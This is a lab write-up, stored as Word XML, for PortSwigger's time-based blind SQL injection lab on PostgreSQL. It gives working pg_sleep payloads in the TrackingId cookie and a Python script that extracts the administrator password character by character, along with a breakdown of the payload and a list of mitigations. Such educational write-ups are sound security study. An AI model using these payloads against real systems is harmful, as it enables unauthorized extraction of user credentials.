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LAB WRITEUP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5e"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection with Time Delays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PortSwigger Web Security Academy  |  Practitioner  |  Time-Based Blind SQLi  |  PostgreSQL</w:t>
      </w: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 Lab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Blind SQL injection with time delays and information retrieval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Difficulty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Practitioner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 — Blind / Time-Based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Injection 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TrackingId cookie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Oracle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pg_sleep(10) = TRUE, pg_sleep(0) = FALSE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Length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characters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Solved ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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 Vulnerability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TrackingId cookie value is concatenated unsanitised into a SQL query. There is no visible oracle in the HTTP response at all — no error messages, no conditional content. The only signal is response time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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PostgreSQL's pg_sleep(n) function pauses query execution for n seconds. By injecting a CASE WHEN expression that calls pg_sleep(3) on TRUE and pg_sleep(0) on FALSE, each request becomes a binary question: does the response take 3+ seconds, or not?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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technique is called time-based blind SQL injection. It is the most stealthy form of SQL injection — completely invisible to anyone watching HTTP content — but detectable through response timing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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 Manual Exploitation (Burp Suite)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1 — Confirm Time Delay Works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True condition — application delays ~10 seconds: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TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--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False condition — application responds immediately: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TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--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2 — Confirm administrator User Exists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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--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 second delay confirms the administrator user exists in the users table.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3 — Determine Password Length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Increment the length threshold. When response stops delaying, the threshold has passed the actual length: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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)&gt;1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)&gt;2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--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... (continue until response is immediate)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Result: password is exactly 20 characters long.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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8a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Extract Characters (Burp Intruder)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TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--</w:t>
      </w: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Burp Community Intruder is rate-throttled AND each request waits up to 10 seconds. For 720 requests this is impractical. Use the Python script instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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 Automated Exploitation — Python Script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script uses string concatenation injection (||) rather than stacked queries — more portable and reliable. The sleep threshold is reduced to 3 seconds for speed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pP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requests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string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import time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url            = "https://0ab2009c04b2502b8027e48000160095.web-security-academy.net/"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tracking_id    = "51sua3nyQiEwB5th"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session_cookie = "QULyXGpc9KXIWEfVBR3Rbx9ndp6qk5Vq"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charset  = string.ascii_lowercase + string.digits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password = ""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headers = {"User-Agent": "Mozilla/5.0", "Referer": url}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def test_char(position, char):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payload = (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f"{tracking_id}'||("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f"SELECT CASE WHEN (username='administrator' AND substring(password,{position},1)='{char}') "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f"THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users"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f")||'--"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)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cookies = {"TrackingId": payload, "session": session_cookie}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start   = time.time()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requests.get(url, cookies=cookies, headers=headers, timeout=15)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elapsed = time.time() - start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return elapsed &gt; 2.5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for position in range(1, 21):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print(f"[+] Testing position {position}...")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for char in charset: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if test_char(position, char):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print(f"    [✔] Position {position}: '{char}'")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password += char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      break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print(f"\n🔥 Extracted password: {password}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="36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⚠ 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tracking_id and session_cookie are unique per lab instance. Copy fresh values from Burp each time you start the lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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 Injection Payload Breakdown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decoded payload for position 1, testing character 'a':</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f5f5f5" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="5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51sua3nyQiEwB5th'||(SELECT CASE WHEN (username='administrator' AND substring(password,1,1)='a') THEN pg_sleep(3) ELSE pg_sleep(0) END FROM users)||'--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Part</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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51sua3nyQiEwB5th'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Closes the original string literal in the SQL query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||( SELECT ... END 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Concatenates the subquery result inline — no stacked query needed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CASE WHEN (...)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Conditional: evaluates the boolean test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username='administrator'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Scopes to the target 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substring(password,N,1)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Extracts one character at position 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THEN pg_sleep(3)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branch — delays response by 3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ELSE pg_sleep(0)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branch — returns immediately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FROM users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scope for the CASE expression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)||'--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Reopens the string literal and comments out the rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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6. Stacked Queries vs Concatenation Injection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Stacked query (;)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x'%3BSELECT ...--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%3B for semicolon; requires PostgreSQL stacked query support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concat (||)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x'||(SELECT ...)||'--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inline without stacked queries; used in the Python script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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 Why Python Over Burp Community Intruder?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4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Community Intruder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Rate-throttled + 10s sleep per request = potentially hours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Burp Pro Intruder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throttle — requires paid license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requests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Free, 3s threshold, finishes in a few minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pP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8. Mitigations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Parameterized Queries — User input is bound as a variable, never concatenated into SQL. This is the complete fix.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Least Privilege — The app's DB account should not have SELECT on the users table or permission to call pg_sleep.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Cookie Integrity — Sign or encrypt the TrackingId cookie so its value cannot be tampered with by clients.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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF — Detect pg_sleep, CASE WHEN, and time-delay injection patterns appearing in cookie headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="16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PortSwigger Web Security Academy  |  For educational purposes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2026-04-10T09:24:48.431Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-10T09:24:48.432Z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